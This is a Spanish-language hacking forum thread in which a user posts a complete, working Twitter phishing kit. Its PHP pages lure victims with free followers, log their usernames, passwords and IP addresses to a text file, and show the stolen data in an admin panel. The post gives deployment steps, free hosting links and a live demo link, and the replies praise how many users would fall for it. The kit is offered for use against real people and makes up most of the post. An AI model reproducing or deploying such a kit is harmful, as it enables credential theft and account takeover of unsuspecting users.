Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Phishing] Página de phishing para Twitter

  • 8 Respuestas
  • 7598 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado bernatixer

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
  • Not yet
    • Ver Perfil
    • bernatixer
  • Skype: bernat.torres.bellido
  • Twitter: BernatTorres
« en: Enero 01, 2016, 11:57:36 am »

Buenas soy bernatixer, hasta el día de hoy underc0de y sus usuarios me han proporcionado mucha información y herramientas, así que hoy decido aportar mi granito de arena a la comunidad.

Se trata de una página de phishing para twitter. La web pretende añadir seguidores (bots) a tu cuenta de twitter, y como todos sabemos cuando alguien con pocos conocimientos busca algo gratis (que normalmente es de pago) se descarga todo e introduce sus datos donde sea por tal de lograrlo. Así que en este caso nos vamos a aprovechar de esto.

Funcionamiento:
El usuario (víctima) entra en la web, introduce sus datos (usuario y contraseña :D) el número de seguidores que quiere (para hacerlo más real a partir de 1000 seguidores tendrá que pagar...) le da a un botón y que mala suerte! Ha ocurrido un error al añadir los seguidores a su cuenta.
Estos datos se guardaran en un archivo TXT, así que en ningún momento se va a necesitar MySQL, SQLite, o cualquier otro.
Y para terminar, hay un panel de admin de todas las víctimas, su usuario, contraseña y IP, todo automatico. (La contraseña default del panel de admin es 'b3rn4t1x3r').

Información técnica:
La web esta programada con Bootstrap para hacerla responsive, limpia etc... No se necesita descargar ningún archivo CSS ni JS, están todos alojados en un CDN y minificados, así que se aumenta el tiempo de respuesta. En resumen, todo esto es para que la víctima vea que la web esta algo trabajada y confíe mas en nosotros.

Si quieres provar la web, la he subido a mi servidor (Las IPs no se muestran en esta versión)
[Porvafor si quereis hacer phishing no paseis este link, seguid el tutorial de abajo]
Phishing: http://bernatixer.com/twitter/
Citar
Panel: http://bernatixer.com/twitter/admin
Citar

Tutorial:
La web es muy fácil de editar, pero si no dominais mucho aquí van unas pequeñas explicaciones.
Teniendo en cuenta que el HTML es senzillo de entender voy a pasar directamente al PHP y si teneis alguna duda simplemente comentadla.
Lo que hace falta saber de PHP en el archivo 'index.php' es que si quereis cambiar el archivo de logs (Por defecto: datos.txt) teneis que canviar la variable [$fichero = "datos.txt";]
Del archivo 'admin.php' solo hace falta saber cambiar la pass, está en la línea 35. Nada mas, es algo senzillo en los dos casos.

No teneis servidor para hacer pruebas o subir la web? Os dejo una lista de hostings gratis:
 - http://www.hostinger.es/
 - https://www.000webhost.com/

IMPORTANTE: Recordad crear el archivo 'datos.txt', ya que sino no funcionara correctamente.
index.php
Código: PHP
  1. <!DOCTYPE html>
  2. <html lang="en">
  3.   <head>
  4.     <meta charset="utf-8">
  5.     <meta http-equiv="X-UA-Compatible" content="IE=edge">
  6.     <meta name="viewport" content="width=device-width, initial-scale=1">
  7.     <title>Twitter - Bots</title>
  8.     <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7" crossorigin="anonymous">
  9.     <style>
  10.     body {
  11.       height:100%;
  12.       width:100%;
  13.       background-image: url("http://www.imperial.ac.uk/imedia/general_graphics/interact/images/twitterBG.jpg");
  14.       background-repeat: no-repeat;
  15.       background-size:cover;
  16.     }
  17.     .centrar {
  18.       min-height: 100vh;
  19.       display: flex;
  20.       align-items: center;
  21.     }
  22.     </style>
  23.   </head>
  24.   <body>
  25.   <?php
  26.   if (isset($_POST["usuario"]) && isset($_POST["pass"])) {
  27.     $fichero = "datos.txt";
  28.     $usuario = htmlentities(str_replace("<:>","",$_POST["usuario"]));
  29.     $pass = htmlentities(str_replace("<:>","",$_POST["pass"]));
  30.     $ip = $_SERVER['REMOTE_ADDR'];
  31.     $text = $usuario."<:>".$pass."<:>".$ip;
  32.     $nuevo = file_get_contents($fichero);
  33.     $nuevo .= $text."\n";
  34.     file_put_contents($fichero, $nuevo);
  35.     $m = "<div class='alert alert-danger' role='alert'>Error 225; No se han podido añadir los seguidores en tu cuenta.</div>";
  36.   }else{
  37.     $m = "";
  38.   }
  39.   ?>
  40.   <div class="container centrar">
  41.     <div class="row">
  42.       <div class="col-md-12">
  43.         <div class="alert alert-info">
  44.           <h1><b>SEGUIDORES EN TWITTER GRATIS</b></h1><hr/>
  45.           <form method="POST" action="#">
  46.             <?php echo $m; ?>
  47.             <input name="usuario" type="text" class="form-control" placeholder="Nombre de usuario"><br/>
  48.             <input name="pass" type="password" class="form-control" placeholder="Contraseña"><br/>
  49.             <select class="form-control">
  50.               <option>10 seguidores (GRATIS)</option>
  51.               <option>50 seguidores (GRATIS)</option>
  52.               <option>100 seguidores (GRATIS)</option>
  53.               <option>1000 seguidores (GRATIS)</option>
  54.               <option>5000 seguidores (10€)</option>
  55.               <option>10000 seguidores (50€)</option>
  56.             </select><br/>
  57.             <button class="btn btn-success btn-lg btn-block" type="submit">Añadir seguidores</button>
  58.           </form>
  59.         </div>
  60.       </div>
  61.     </div>
  62.   </div>
  63.   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
  64.   <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js" integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS" crossorigin="anonymous"></script>
  65.   </body>
  66. </html>
  67.  

admin.php
Código: PHP
  1. <!DOCTYPE html>
  2. <html lang="en">
  3.   <head>
  4.     <meta charset="utf-8">
  5.     <meta http-equiv="X-UA-Compatible" content="IE=edge">
  6.     <meta name="viewport" content="width=device-width, initial-scale=1">
  7.     <title>Twitter - Bots</title>
  8.     <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7" crossorigin="anonymous">
  9.     <style>
  10.     body {
  11.       height:100%;
  12.       width:100%;
  13.       background-image: url("https://mal.sec.gd/images/bgSlider/img01.png");
  14.       background-repeat: no-repeat;
  15.       background-size:cover;
  16.     }
  17.     .espacio {
  18.       margin-top: 5vh;
  19.     }
  20.     </style>
  21.   </head>
  22.   <body>
  23.   <div class="container espacio">
  24.   <div class="alert alert-danger">
  25.     <?php
  26. if (!isset($_POST["pass"])) {
  27.     ?>
  28.     <form method="POST" action="#">
  29.       <input name="pass" type="password" class="form-control" placeholder="Contraseña"><br/>
  30.       <button class="btn btn-danger btn-lg btn-block" type="submit">Entrar</button>
  31.     </form>
  32.     <?php
  33.     exit;
  34. } else {
  35. if ($_POST["pass"] != "b3rn4t1x3r") {
  36.   ?>
  37.   <div class='alert alert-warning' role='alert'>Contraseña incorrecta</div>
  38.   <form method="POST" action="#">
  39.     <input name="pass" type="password" class="form-control" placeholder="Contraseña"><br/>
  40.     <button class="btn btn-danger btn-lg btn-block" type="submit">Entrar</button>
  41.   </form>
  42.   <?php
  43. } else {
  44. ?>
  45.     <div class="text-right"><a class="btn btn-danger" href="">Salir</a></div>
  46.     <h2>Datos de los usuarios</h2><hr/>
  47.     <table class="table table-striped">
  48.       <thead>
  49.         <tr>
  50.           <th>Usuario</th>
  51.           <th>Contraseña</th>
  52.           <th>IP</th>
  53.         </tr>
  54.       </thead>
  55.       <tbody>
  56.         <?php
  57.         $fichero = fopen('datos.txt','r');
  58.         while ($linea = fgets($fichero)) {
  59.           $array = explode('<:>', trim($linea));
  60.           echo "<tr>";
  61.           echo "<th><font color='green'>". $array[0] ."</font></th>";
  62.           echo "<th><font color='green'>". $array[1] ."</font></th>";
  63.           echo "<th><font color='green'>". $array[2] ."</font></th>";
  64.           echo "</tr>";
  65.         }
  66.         fclose($fichero);
  67.         ?>
  68.       </tbody>
  69.     </table>
  70.   </div>
  71.   <?php
  72. }
  73. }
  74.   ?>
  75.   </div>
  76.   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
  77.   <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js" integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS" crossorigin="anonymous"></script>
  78.   </body>
  79. </html>
  80.  
« Última modificación: Enero 02, 2016, 09:20:58 am por Bernatixer »

Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 876
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #1 en: Enero 01, 2016, 10:32:36 pm »
Muy bueno!

Ya te lo he dicho por skype, pero recalco por aqui tambien. Ese código tiene XSS :D
Si puedes arreglarlo sería genial.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5487
  • Actividad:
    26.67%
  • Reputación 35
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #2 en: Enero 01, 2016, 10:44:48 pm »
Muy bueno bro!
Respecto a lo que dice @rollth, te dejo un link de un taller de XSS que hicimos: https://underc0de.org/foro/talleres-underc0de-213/taller-de-seguridad-web-1/
Ahi aparecen dos formas de fixear el XSS

Saludos!
ANTRAX


Desconectado bernatixer

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
  • Not yet
    • Ver Perfil
    • bernatixer
  • Skype: bernat.torres.bellido
  • Twitter: BernatTorres
« Respuesta #3 en: Enero 02, 2016, 09:22:57 am »
Gracias por avisar de la vulnerabilidad, ya esta solucionado  ;)

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5487
  • Actividad:
    26.67%
  • Reputación 35
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #4 en: Enero 02, 2016, 12:09:41 pm »
Gracias por avisar de la vulnerabilidad, ya esta solucionado  ;)

Gran trabajo bro! Muy buen aporte!
Te dejare +c0in


Desconectado Stiuvert

  • *
  • Underc0der
  • Mensajes: 2674
  • Actividad:
    0%
  • Reputación 15
    • Ver Perfil
  • Skype: [email protected]
  • Twitter: @Stiuvert
« Respuesta #5 en: Enero 02, 2016, 01:48:24 pm »
Excelente fake, realmente sencillo y eficaz, seguro que más de uno picaría  ::)  ;D
Y gran trabajo corrigiendo ese XSS!!

Saludos

Conectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1921
  • Actividad:
    3.33%
  • Reputación 15
    • Ver Perfil
« Respuesta #6 en: Enero 02, 2016, 02:15:46 pm »
Fuck, probé el xss antes de leer los comentarios y obviamente no saltó jajajaja.

Buen trabajo @Bernatixer, estoy seguro que caerían muchos usuarios con este tipo de métodos.

Saludos.



Desconectado ignorante

  • *
  • Underc0der
  • Mensajes: 19
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #7 en: Enero 07, 2016, 09:49:27 am »
Buenas, tal vez sobre este comentario,si es asi disculpen,  pero conocen setoolkit ?
https://www.trustedsec.com/social-engineer-toolkit/

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5487
  • Actividad:
    26.67%
  • Reputación 35
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #8 en: Enero 07, 2016, 10:23:35 am »
Buenas, tal vez sobre este comentario,si es asi disculpen,  pero conocen setoolkit ?
https://www.trustedsec.com/social-engineer-toolkit/

Si es cierto, se podría usar SET. Hace un tiempo dejé un paper en el foro sobre eso

https://underc0de.org/foro/hacking/java-applet-attack-method-backdorizacion-con-set-by-antrax/

Saludos!
ANTRAX


 

¿Te gustó el post? COMPARTILO!



Eternal - Un escáner para Eternal Blue

Iniciado por puntoCL

Respuestas: 2
Vistas: 3960
Último mensaje Julio 23, 2017, 10:37:05 pm
por puntoCL
Paso a paso para ser un verdadero < HACKER > lo mejor que hay

Iniciado por smown

Respuestas: 5
Vistas: 5159
Último mensaje Agosto 17, 2018, 09:20:02 am
por ANTRAX
Sniffer para windows "RawCap"

Iniciado por s747ik

Respuestas: 1
Vistas: 3879
Último mensaje Junio 12, 2011, 04:08:03 pm
por staRgan
Conocimientos importantes para "empezar" en la seguridad informática.

Iniciado por Bael

Respuestas: 37
Vistas: 44478
Último mensaje Abril 30, 2019, 04:11:02 pm
por Luisao
¿Cual Backtrack, Kali, Bugtraq,Backbox o BlackArch y otras hierbas para aprender

Iniciado por Snifer

Respuestas: 0
Vistas: 3347
Último mensaje Marzo 15, 2014, 11:07:50 am
por Snifer